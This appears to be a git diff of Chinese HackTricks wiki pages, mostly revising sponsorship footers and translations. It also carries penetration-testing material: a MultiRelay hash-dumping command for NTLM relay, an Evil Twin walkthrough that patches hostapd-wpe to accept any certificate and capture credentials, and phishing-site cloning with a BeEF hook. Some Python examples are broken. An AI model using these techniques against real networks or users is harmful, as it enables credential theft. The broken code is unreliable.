在 Windows 中,**您可能能够强制一些特权帐户对任意机器进行身份验证**。阅读以下页面以了解详情:
|
||||
在 Windows 中,您**可能能够强制一些特权帐户对任意机器进行身份验证**。阅读以下页面以了解详情:
|
||||
|
||||
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
|
||||
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
|
||||
|
@ -126,16 +127,17 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
|
|||
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们**。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,21 +1,22 @@
|
|||
# 恶意双子EAP-TLS
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**赏金提示**:**注册**Intigriti,这是一家由黑客创建的高级**赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
|
||||
**赏金提示**:**注册**Intigriti,这是一个由黑客创建的高级**赏金平台**!立即加入我们:[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
|
@ -26,30 +27,30 @@
|
|||
### 分析和利用无线网络中的EAP-TLS
|
||||
|
||||
#### 背景:无线网络中的EAP-TLS
|
||||
EAP-TLS是一种安全协议,使用证书在客户端和服务器之间提供相互认证。只有在客户端和服务器互相验证对方的证书时,连接才会建立。
|
||||
EAP-TLS是一种安全协议,使用证书在客户端和服务器之间提供相互认证。只有在客户端和服务器互相验证彼此的证书时,连接才会建立。
|
||||
|
||||
#### 遇到的挑战
|
||||
在评估过程中,使用`hostapd-wpe`工具时遇到了一个有趣的错误。由于客户端的证书是由未知的证书颁发机构(CA)签名的,该工具拒绝了客户端的连接。这表明客户端信任了伪造服务器的证书,指向客户端端口的安全配置不严格。
|
||||
|
||||
#### 目标:设置中间人攻击(MiTM)
|
||||
#### 目标:设置中间人攻击(MiTM)攻击
|
||||
目标是修改工具以接受任何客户端证书。这将允许与恶意无线网络建立连接,并启用MiTM攻击,可能捕获明文凭据或其他敏感数据。
|
||||
|
||||
#### 解决方案:修改`hostapd-wpe`
|
||||
对`hostapd-wpe`的源代码进行分析后发现,客户端证书验证由OpenSSL函数`SSL_set_verify`中的一个参数(`verify_peer`)控制。通过将此参数的值从1(验证)更改为0(不验证),工具被修改为接受任何客户端证书。
|
||||
对`hostapd-wpe`的源代码进行分析,发现客户端证书验证由OpenSSL函数`SSL_set_verify`中的一个参数(`verify_peer`)控制。通过将此参数的值从1(验证)更改为0(不验证),工具被修改为接受任何客户端证书。
|
||||
|
||||
#### 攻击执行
|
||||
1. **环境检查:** 使用`airodump-ng`监视无线网络并识别目标。
|
||||
2. **设置虚假AP:** 运行修改后的`hostapd-wpe`创建一个模仿目标网络的虚假接入点(AP)。
|
||||
3. **定制强制门户:** 自定义强制门户的登录页面,使其看起来合法且对目标用户熟悉。
|
||||
4. **去认证攻击:** 可选地,执行去认证攻击以将客户端从合法网络断开连接并将其连接到虚假AP。
|
||||
5. **捕获凭据:** 一旦客户端连接到虚假AP并与强制门户交互,它们的凭据就会被捕获。
|
||||
#### 攻击的执行
|
||||
1. **环境检查:**使用`airodump-ng`监视无线网络并识别目标。
|
||||
2. **设置虚假AP:**运行修改后的`hostapd-wpe`创建一个模拟目标网络的虚假接入点(AP)。
|
||||
3. **定制强制门户:**定制强制门户的登录页面,使其看起来合法且对目标用户熟悉。
|
||||
4. **去认证攻击:**可选择执行去认证攻击,将客户端从合法网络断开连接并将其连接到虚假AP。
|
||||
5. **捕获凭据:**一旦客户端连接到虚假AP并与强制门户交互,它们的凭据就会被捕获。
|
||||
|
||||
#### 攻击观察
|
||||
#### 攻击的观察
|
||||
- 在Windows机器上,系统可能会自动连接到虚假AP,在尝试进行网页导航时显示强制门户。
|
||||
- 在iPhone上,用户可能会被提示接受新证书,然后显示强制门户。
|
||||
|
||||
#### 结论
|
||||
尽管EAP-TLS被认为是安全的,但其有效性在很大程度上取决于正确的配置和终端用户的谨慎行为。配置错误的设备或毫不知情的用户接受伪造证书可能会破坏受EAP-TLS保护的网络的安全性。
|
||||
虽然EAP-TLS被认为是安全的,但其有效性在很大程度上取决于正确的配置和终端用户的谨慎行为。配置错误的设备或毫不知情的用户接受伪造证书可能会破坏EAP-TLS保护网络的安全性。
|
||||
|
||||
有关更多详细信息,请查看https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
|
||||
|
||||
|
@ -57,20 +58,21 @@ EAP-TLS是一种安全协议,使用证书在客户端和服务器之间提供
|
|||
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**赏金提示**:**注册**Intigriti,这是一家由黑客创建的高级**赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
|
||||
**赏金提示**:**注册**Intigriti,这是一个由黑客创建的高级**赏金平台**!立即加入我们:[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -18,9 +19,9 @@
|
|||
|
||||
|
||||
|
||||
对于钓鱼评估,有时完全**克隆一个网站**可能会很有用。
|
||||
在进行钓鱼评估时,有时完全**克隆一个网站**可能会很有用。
|
||||
|
||||
请注意,您还可以向克隆的网站添加一些有效负载,比如BeEF钩子,以“控制”用户的标签页。
|
||||
请注意,您还可以向克隆的网站添加一些有效负载,比如 BeEF 钩子,以“控制”用户的标签页。
|
||||
|
||||
有不同的工具可用于此目的:
|
||||
|
||||
|
@ -41,17 +42,17 @@ goclone <url>
|
|||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄,使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,30 +1,31 @@
|
|||
# 基础 Python
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或**关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## Python 基础
|
||||
|
||||
### 有用信息
|
||||
|
||||
list(xrange()) == range() --> 在 Python3 中,range 是 Python2 的 xrange(它不是列表而是生成器)\
|
||||
元组和列表的区别在于元组中值的位置赋予其含义,而列表只是有序值。元组具有结构,而列表具有顺序。
|
||||
list(xrange()) == range() --> 在 Python3 中,range 是 Python2 的 xrange (它不是一个列表而是一个生成器)\
|
||||
元组和列表的区别在于元组中值的位置赋予其含义,而列表只是有序值。元组有结构,而列表有顺序。
|
||||
|
||||
### 主要操作
|
||||
|
||||
要求一个数的幂,使用:3\*\*2(不是 3^2)\
|
||||
如果执行 2/3,会返回 1,因为您在将两个整数(integers)相除。如果要小数,应该除以浮点数(2.0/3.0)。\
|
||||
要求一个数的幂,使用:3\*\*2 (不是 3^2)\
|
||||
如果执行 2/3,会返回 1,因为你在除两个整数 (integers)。如果想要小数,应该除以浮点数 (2.0/3.0).\
|
||||
i >= j\
|
||||
i <= j\
|
||||
i == j\
|
||||
|
@ -123,30 +124,30 @@ keys = \[k for k in monthNumbers]\
|
|||
a={'9':9}\
|
||||
monthNumbers.update(a) = {'9':9, 1:'Jan', 2: 'feb','feb':2}\
|
||||
mN = monthNumbers.copy() #独立复制\
|
||||
monthNumbers.get('key',0) #检查键是否存在,如果存在则返回monthNumbers\["key"]的值,否则返回0
|
||||
monthNumbers.get('key',0) #检查键是否存在,如果存在则返回 monthNumbers\["key"] 的值,否则返回 0
|
||||
|
||||
### 集合
|
||||
|
||||
集合中没有重复项\
|
||||
集合中没有重复元素\
|
||||
myset = set(\['a', 'b']) = {'a', 'b'}\
|
||||
myset.add('c') = {'a', 'b', 'c'}\
|
||||
myset.add('a') = {'a', 'b', 'c'} #无重复项\
|
||||
myset.add('a') = {'a', 'b', 'c'} #没有重复\
|
||||
myset.update(\[1, 2, 3]) = set(\['a', 1, 2, 'b', 'c', 3])\
|
||||
myset.discard(10) #如果存在,则移除,否则不做任何操作\
|
||||
myset.discard(10) #如果存在则移除,否则不做任何操作\
|
||||
myset.remove(10) #如果存在则移除,否则引发异常\
|
||||
myset2 = set(\[1, 2, 3, 4])\
|
||||
myset.union(myset2) #myset和myset2的值\
|
||||
myset.intersection(myset2) #myset和myset2中的值\
|
||||
myset.difference(myset2) #myset中但不在myset2中的值\
|
||||
myset.symmetric\_difference(myset2) #不在myset和myset2中的值(两者都不在)\
|
||||
myset.union(myset2) #myset 或 myset2 中的值\
|
||||
myset.intersection(myset2) #myset 和 myset2 中的值\
|
||||
myset.difference(myset2) #myset 中但不在 myset2 中的值\
|
||||
myset.symmetric\_difference(myset2) #不在 myset 和 myset2 中的值(两者都不在)\
|
||||
myset.pop() #获取集合的第一个元素并将其移除\
|
||||
myset.intersection\_update(myset2) #myset = myset和myset2中的元素\
|
||||
myset.difference\_update(myset2) #myset = myset中但不在myset2中的元素\
|
||||
myset.intersection\_update(myset2) #myset = myset 和 myset2 中的元素\
|
||||
myset.difference\_update(myset2) #myset = myset 中但不在 myset2 中的元素\
|
||||
myset.symmetric\_difference\_update(myset2) #myset = 两者都不在的元素
|
||||
|
||||
### 类
|
||||
|
||||
\_\_It\_\_中的方法将用于排序,以比较此类的对象是否大于其他对象
|
||||
\_\_It\_\_ 中的方法将用于排序,以比较此类对象是否大于其他对象
|
||||
```python
|
||||
class Person(name):
|
||||
def __init__(self,name):
|
||||
|
@ -199,11 +200,13 @@ class Car:
|
|||
crash = lambda self: print('Boom!')
|
||||
my_car = Car(); my_car.crash() = 'Boom!'
|
||||
```
|
||||
```python
|
||||
mult1 = [x for x in [1, 2, 3, 4, 5, 6, 7, 8, 9] if x%3 == 0 ]
|
||||
```html
|
||||
<h2>异常</h2>
|
||||
```
|
||||
|
||||
### 异常
|
||||
```markdown
|
||||
mult1 = \[x for x in \[1, 2, 3, 4, 5, 6, 7, 8, 9] if x%3 == 0 ]
|
||||
```
|
||||
```
|
||||
def divide(x,y):
|
||||
try:
|
||||
|
@ -219,7 +222,7 @@ print “executing finally clause in any case”
|
|||
```
|
||||
### Assert()
|
||||
|
||||
如果条件为假,则会在屏幕上打印字符串
|
||||
如果条件为假,则字符串将被打印在屏幕上
|
||||
```
|
||||
def avg(grades, weights):
|
||||
assert not len(grades) == 0, 'no grades data'
|
||||
|
@ -227,7 +230,7 @@ assert len(grades) == 'wrong number grades'
|
|||
```
|
||||
### 生成器,yield
|
||||
|
||||
生成器不是返回某个东西,而是"产出"某个东西。当你访问它时,它会"返回"生成的第一个值,然后,你可以再次访问它,它将返回生成的下一个值。因此,所有的值不是同时生成的,使用这种方法而不是包含所有值的列表可以节省大量内存。
|
||||
一个生成器,不是返回某个东西,而是"产出"某个东西。当你访问它时,它会"返回"第一个生成的值,然后,你可以再次访问它,它将返回下一个生成的值。因此,所有的值不是同时生成的,使用这种方法而不是包含所有值的列表可以节省大量内存。
|
||||
```
|
||||
def myGen(n):
|
||||
yield n
|
||||
|
@ -312,16 +315,17 @@ Let's call our decorated function
|
|||
Decorated func!
|
||||
Execution time: 4.792213439941406e-05 seconds
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```python
|
||||
import hashlib
|
||||
|
||||
|
@ -61,16 +62,17 @@ return 0
|
|||
|
||||
main()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
